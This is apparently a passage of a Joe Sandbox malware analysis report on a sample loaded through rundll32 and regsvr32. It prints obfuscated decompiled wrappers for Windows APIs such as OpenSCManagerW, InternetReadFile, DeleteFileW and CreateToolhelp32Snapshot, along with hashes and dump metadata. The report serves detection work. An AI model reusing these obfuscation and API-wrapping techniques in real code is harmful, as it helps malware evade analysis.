                                                                                                            				_v28 = 0xc52aa;
                                                                                                            				_v24 = 0x95615;
                                                                                                            				_v20 = 0x738ab;
                                                                                                            				_v16 = 0x613b6f;
                                                                                                            				_v16 = _v16 << 5;
                                                                                                            				_v16 = _v16 ^ 0x0c263f45;
                                                                                                            				_v8 = 0x987e64;
                                                                                                            				_v8 = _v8 + 0xffff93dc;
                                                                                                            				_v8 = _v8 >> 5;
                                                                                                            				_v8 = _v8 + 0x46a8;
                                                                                                            				_v8 = _v8 ^ 0x00098c86;
                                                                                                            				_v12 = 0x302d8a;
                                                                                                            				_v12 = _v12 << 0xe;
                                                                                                            				_v12 = _v12 | 0xe7847ef7;
                                                                                                            				_v12 = _v12 ^ 0xefed21e1;
                                                                                                            				E00E252F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
                                                                                                            				_t37 = LoadLibraryW(_t40); // executed
                                                                                                            				return _t37;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00E3F73F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: o;a$!$CJD
                                                                                                            • API String ID: 1029625771-3784180784
                                                                                                            • Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
                                                                                                            • Instruction ID: fce3e7aaf8b96be66a26907995cb99ea6bcee664c3084657e215ac86aa4ea1bb
                                                                                                            • Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
                                                                                                            • Instruction Fuzzy Hash: E61112B6C01308BBCB01EFA4C90A88EBFB4EB11314F508088E91576251E3B98B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 455 e37e14-e37eb8 call e332c4 call e252f2 OpenSCManagerW
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00E37E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				short* _v20;
                                                                                                            				short* _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t33;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(0);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(0);
                                                                                                            				_push(__ecx);
                                                                                                            				E00E332C4(_t33);
                                                                                                            				_v28 = 0x38698;
                                                                                                            				_v24 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0xf80068;
                                                                                                            				_v12 = _v12 << 8;
                                                                                                            				_v12 = _v12 + 0x9c2a;
                                                                                                            				_v12 = _v12 ^ 0xf804c3a3;
                                                                                                            				_v8 = 0xd3ebc3;
                                                                                                            				_v8 = _v8 << 0x10;
                                                                                                            				_v8 = _v8 >> 0x10;
                                                                                                            				_v8 = _v8 * 0xd;
                                                                                                            				_v8 = _v8 ^ 0x000f62ee;
                                                                                                            				_v16 = 0x690a65;
                                                                                                            				_v16 = _v16 | 0xebc01c25;
                                                                                                            				_v16 = _v16 ^ 0xebe7ec5f;
                                                                                                            				E00E252F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
                                                                                                            				_t40 = OpenSCManagerW(0, 0, _a20); // executed
                                                                                                            				return _t40;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E37EB2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ManagerOpen
                                                                                                            • String ID: _
                                                                                                            • API String ID: 1889721586-4005583852
                                                                                                            • Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
                                                                                                            • Instruction ID: 5ddbd0eb3402d0a3ff8ce4a95d2283ed117cec6c9aab5c04cacb4bd66ece50d6
                                                                                                            • Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
                                                                                                            • Instruction Fuzzy Hash: 7B1136B2C01218FBDF01DF98D90A8CEBFB9EF04340F108089F815A2251D3B58B20EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 460 e358bd-e35953 call e332c4 call e252f2 DeleteFileW
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00E358BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				unsigned int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t27;
                                                                                                            				int _t35;
                                                                                                            				WCHAR* _t38;
                                                                                                            
                                                                                                            				_push(_a4);
                                                                                                            				_t38 = __ecx;
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E00E332C4(_t27);
                                                                                                            				_v16 = 0x13586;
                                                                                                            				_v16 = 0x4c59cc;
                                                                                                            				_v16 = _v16 ^ 0xe50d706a;
                                                                                                            				_v16 = _v16 ^ 0xe54f7d54;
                                                                                                            				_v12 = 0x3bf9e4;
                                                                                                            				_v12 = _v12 + 0x106;
                                                                                                            				_v12 = _v12 * 0x7a;
                                                                                                            				_v12 = _v12 ^ 0x1c92743a;
                                                                                                            				_v8 = 0x406212;
                                                                                                            				_v8 = _v8 * 0x60;
                                                                                                            				_v8 = _v8 + 0xffffd8c7;
                                                                                                            				_v8 = _v8 >> 0xb;
                                                                                                            				_v8 = _v8 ^ 0x000758b5;
                                                                                                            				E00E252F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
                                                                                                            				_t35 = DeleteFileW(_t38); // executed
                                                                                                            				return _t35;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00E3594D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID: T}O
                                                                                                            • API String ID: 4033686569-2430299532
                                                                                                            • Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
                                                                                                            • Instruction ID: cefc99f974ba43b41bc6462f1703775d919415f3170dcb32759ac76e649ff2b3
                                                                                                            • Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
                                                                                                            • Instruction Fuzzy Hash: 360102B5D01608FBCB04DFA8D9469DEBFB4EB00318F20C199E514B7250E7B85B948F95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 465 e3602c-e360f9 call e332c4 call e252f2 CreateFileW
                                                                                                            C-Code - Quality: 55%
                                                                                                            			E00E3602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				void* _t42;
                                                                                                            				void* _t50;
                                                                                                            				signed int _t53;
                                                                                                            				long _t57;
                                                                                                            				long _t58;
                                                                                                            
                                                                                                            				_t58 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a36);
                                                                                                            				_t57 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a28);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E00E332C4(_t42);
                                                                                                            				_v32 = 0xf2bcc;
                                                                                                            				_v28 = 0x9963f;
                                                                                                            				_v24 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0x481e97;
                                                                                                            				_v12 = _v12 + 0x3bb9;
                                                                                                            				_v12 = _v12 | 0xe5ca697e;
                                                                                                            				_v12 = _v12 ^ 0xe5cf84b6;
                                                                                                            				_v8 = 0xca7b5c;
                                                                                                            				_t53 = 0x38;
                                                                                                            				_v8 = _v8 / _t53;
                                                                                                            				_v8 = _v8 >> 6;
                                                                                                            				_v8 = _v8 ^ 0x0004807b;
                                                                                                            				_v16 = 0xf3cd85;
                                                                                                            				_v16 = _v16 ^ 0x0b7576d7;
                                                                                                            				_v16 = _v16 ^ 0x0b87a2f8;
                                                                                                            				E00E252F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
                                                                                                            				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
                                                                                                            				return _t50;
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 00E360F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
                                                                                                            • Instruction ID: 008713cfc60d03666b45075fb5eda546c173dd79adea0e2f3f6533933265e6a0
                                                                                                            • Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
                                                                                                            • Instruction Fuzzy Hash: DD21257290020DBFDF05DF95DC898AFBFB9EB44354F108098FA1462220D7768A64AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 470 e22cc4-e22d6e call e332c4 call e252f2 RtlAllocateHeap
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00E22CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t35;
                                                                                                            				void* _t42;
                                                                                                            				void* _t45;
                                                                                                            
                                                                                                            				_push(_a16);
                                                                                                            				_t45 = __edx;
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E00E332C4(_t35);
                                                                                                            				_v20 = 0xfe94d;
                                                                                                            				_v16 = 0xab1c4;
                                                                                                            				_v16 = 0x50de48;
                                                                                                            				_v16 = _v16 * 0x6c;
                                                                                                            				_v16 = _v16 << 0x10;
                                                                                                            				_v16 = _v16 ^ 0xc664fcf6;
                                                                                                            				_v8 = 0xfaad6e;
                                                                                                            				_v8 = _v8 << 0xf;
                                                                                                            				_v8 = _v8 + 0xffffd3fa;
                                                                                                            				_v8 = _v8 ^ 0xf4e1ffa5;
                                                                                                            				_v8 = _v8 ^ 0xa25eb8a6;
                                                                                                            				_v12 = 0xe37a21;
                                                                                                            				_v12 = _v12 << 0xa;
                                                                                                            				_v12 = _v12 << 9;
                                                                                                            				_v12 = _v12 ^ 0xd10447cc;
                                                                                                            				E00E252F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
                                                                                                            				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
                                                                                                            				return _t42;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 00E22D68
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
                                                                                                            • Instruction ID: f9e882bff309044bfda1a9217f13710e158067227ba53905579a2f228fcf6857
                                                                                                            • Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
                                                                                                            • Instruction Fuzzy Hash: 1211DFB2C04208BBCB01EFE4D94A8DEBFB4EF45300F108488E92566262D3758B20EF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 475 e408c3-e40950 call e252f2 ExitProcess
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00E408C3() {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t32;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_v20 = 0xba35d;
                                                                                                            				_v16 = 0x2c63f;
                                                                                                            				_v8 = 0x18668b;
                                                                                                            				_v8 = _v8 << 7;
                                                                                                            				_v8 = _v8 * 0x77;
                                                                                                            				_v8 = _v8 + 0xffff88d8;
                                                                                                            				_v8 = _v8 ^ 0xabd92865;
                                                                                                            				_v12 = 0xa923ab;
                                                                                                            				_v12 = _v12 + 0xffffe870;
                                                                                                            				_v12 = _v12 ^ 0x2e66d6cd;
                                                                                                            				_v12 = _v12 ^ 0x2eca4b61;
                                                                                                            				_v16 = 0xa7f2df;
                                                                                                            				_v16 = _v16 + 0xffff74c1;
                                                                                                            				_v16 = _v16 ^ 0x00a03459;
                                                                                                            				E00E252F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
                                                                                                            				ExitProcess(0);
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00E4094B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
                                                                                                            • Instruction ID: 4e4341be0ed301b31adee68a89e7af02b84e16576038f721e5e4b1a6f1707dae
                                                                                                            • Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
                                                                                                            • Instruction Fuzzy Hash: A90104B1D4130CFBDB44DFE9E94A98DBBB0EB10714F2081899824B7290D3B44B549F44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:1.1%
                                                                                                            Total number of Nodes:474
                                                                                                            Total number of Limit Nodes:29
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E04D49941(int _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t48;
                                                                                                            				signed int _t49;
                                                                                                            				signed int _t50;
                                                                                                            
                                                                                                            				_v16 = 0x5eef3;
                                                                                                            				_v16 = 0x83cb5a;
                                                                                                            				_v16 = _v16 >> 2;
                                                                                                            				_v16 = _v16 << 0x10;
                                                                                                            				_v16 = _v16 ^ 0xf2dffda8;
                                                                                                            				_v12 = 0xb21851;
                                                                                                            				_v12 = _v12 ^ 0x1822d71c;
                                                                                                            				_v12 = _v12 + 0x40f9;
                                                                                                            				_t49 = 0x60;
                                                                                                            				_v12 = _v12 / _t49;
                                                                                                            				_v12 = _v12 ^ 0x004c577a;
                                                                                                            				_v8 = 0x8c2a75;
                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                            				_t50 = 0x63;
                                                                                                            				_v8 = _v8 * 0x3b;
                                                                                                            				_v8 = _v8 / _t50;
                                                                                                            				_v8 = _v8 ^ 0x00852749;
                                                                                                            				E04D352F2(_t50, _v8 % _t50, _t50, 0x13, 0xb4af59f1, 0x9f49d153);
                                                                                                            				_t48 = CreateToolhelp32Snapshot(_a4, 0); // executed
                                                                                                            				return _t48;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(004C577A,00000000), ref: 04D499D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                            • String ID: zWL
                                                                                                            • API String ID: 3332741929-750252732
                                                                                                            • Opcode ID: cad5d06995fb521708466434498b440f5308f1c900df44b08e8f6c5afc20bf3b
                                                                                                            • Instruction ID: 324665655c1740eab9f0873d9bd60153cf84c8c10e4ee49bffb0bfe754d08330
                                                                                                            • Opcode Fuzzy Hash: cad5d06995fb521708466434498b440f5308f1c900df44b08e8f6c5afc20bf3b
                                                                                                            • Instruction Fuzzy Hash: 6D112776E0020CFBDB04CFE9E98AA9DBBB1EB40704F20C099E515AB250D7B56B589F44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E04D3F766(void* __ecx, void* __edx, DWORD* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t41;
                                                                                                            				int _t49;
                                                                                                            				signed int _t51;
                                                                                                            				void* _t55;
                                                                                                            
                                                                                                            				_push(_a20);
                                                                                                            				_t55 = __edx;
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				E04D432C4(_t41);
                                                                                                            				_v20 = 0x1305f;
                                                                                                            				_v16 = 0x53301;
                                                                                                            				_v8 = 0x62a79b;
                                                                                                            				_t51 = 0x4c;
                                                                                                            				_v8 = _v8 / _t51;
                                                                                                            				_v8 = _v8 >> 0xf;
                                                                                                            				_v8 = _v8 + 0x7db3;
                                                                                                            				_v8 = _v8 ^ 0x000f9f1d;
                                                                                                            				_v16 = 0xcda3ee;
                                                                                                            				_v16 = _v16 ^ 0x2b4bce83;
                                                                                                            				_v16 = _v16 | 0x7c437fde;
                                                                                                            				_v16 = _v16 ^ 0x7fc82022;
                                                                                                            				_v12 = 0x3c13cb;
                                                                                                            				_v12 = _v12 + 0xffff6e52;
                                                                                                            				_v12 = _v12 | 0x4b50b859;
                                                                                                            				_v12 = _v12 ^ 0x4b7f303f;
                                                                                                            				E04D352F2(_t51, _v8 % _t51, _t51, 0xc5, 0xff3fbd3a, 0xfd56727);
                                                                                                            				_t49 = InternetReadFile(_t55, _a16, _a20, _a4); // executed
                                                                                                            				return _t49;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,00F6F1C1,?,4B7F303F,?,?,?,?,?,?,?,?,?,?,00F6F1C1), ref: 04D3F81F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileInternetRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 778332206-0
                                                                                                            • Opcode ID: c5341cbd7942fee7171f7f036385ae2e4400032920e173bae6409882a82237d7
                                                                                                            • Instruction ID: 9fb5147e6957db92ad8c3796af1b16049ef442f53ab535df9a7880c39ee933fe
                                                                                                            • Opcode Fuzzy Hash: c5341cbd7942fee7171f7f036385ae2e4400032920e173bae6409882a82237d7
                                                                                                            • Instruction Fuzzy Hash: B0112376D00208FBDF05DFA5D94A8CEBFB5EF14344F208089E914A6261D3769B64EF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E04D31B61(WCHAR* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				unsigned int _v8;
                                                                                                            				unsigned int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t32;
                                                                                                            				void* _t39;
                                                                                                            				WCHAR* _t42;
                                                                                                            				struct _WIN32_FIND_DATAW* _t43;
                                                                                                            
                                                                                                            				_push(_a8);
                                                                                                            				_t43 = __edx;
                                                                                                            				_t42 = __ecx;
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t32);
                                                                                                            				_v16 = 0x3f5f1;
                                                                                                            				_v12 = 0x415084;
                                                                                                            				_v12 = _v12 << 0xb;
                                                                                                            				_v12 = _v12 << 0xa;
                                                                                                            				_v12 = _v12 >> 1;
                                                                                                            				_v12 = _v12 ^ 0x084deb50;
                                                                                                            				_v8 = 0x4dd0ea;
                                                                                                            				_v8 = _v8 + 0xfffff8f5;
                                                                                                            				_v8 = _v8 + 0xffff22bb;
                                                                                                            				_v8 = _v8 >> 0xb;
                                                                                                            				_v8 = _v8 ^ 0x00074bdf;
                                                                                                            				_v16 = 0xd4793;
                                                                                                            				_v16 = _v16 + 0x7792;
                                                                                                            				_v16 = _v16 * 0x35;
                                                                                                            				_v16 = _v16 ^ 0x02dab258;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x216, 0x884e48ad, 0x9f49d153);
                                                                                                            				_t39 = FindFirstFileW(_t42, _t43); // executed
                                                                                                            				return _t39;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 7f6c96832dda2bbd7389ceacf7463157c0045872c9de874a8099776866ce469c
                                                                                                            • Instruction ID: 8e2a05505ba79a35f072aa121460a79facf81b3ff597024b1f4d0ba7bd698523
                                                                                                            • Opcode Fuzzy Hash: 7f6c96832dda2bbd7389ceacf7463157c0045872c9de874a8099776866ce469c
                                                                                                            • Instruction Fuzzy Hash: 96111572D01608FBCB01DE99D8498DEBFB4EB54758F10C1DAE828A7250D3B85B55DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 642 4d4f6a1-4d4f745 call 4d432c4 call 4d352f2 LoadLibraryW
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E04D4F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				unsigned int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t31;
                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                            				WCHAR* _t40;
                                                                                                            
                                                                                                            				_push(_a12);
                                                                                                            				_t40 = __edx;
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t31);
                                                                                                            				_v28 = 0xc52aa;
                                                                                                            				_v24 = 0x95615;
                                                                                                            				_v20 = 0x738ab;
                                                                                                            				_v16 = 0x613b6f;
                                                                                                            				_v16 = _v16 << 5;
                                                                                                            				_v16 = _v16 ^ 0x0c263f45;
                                                                                                            				_v8 = 0x987e64;
                                                                                                            				_v8 = _v8 + 0xffff93dc;
                                                                                                            				_v8 = _v8 >> 5;
                                                                                                            				_v8 = _v8 + 0x46a8;
                                                                                                            				_v8 = _v8 ^ 0x00098c86;
                                                                                                            				_v12 = 0x302d8a;
                                                                                                            				_v12 = _v12 << 0xe;
                                                                                                            				_v12 = _v12 | 0xe7847ef7;
                                                                                                            				_v12 = _v12 ^ 0xefed21e1;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
                                                                                                            				_t37 = LoadLibraryW(_t40); // executed
                                                                                                            				return _t37;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 04D4F73F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
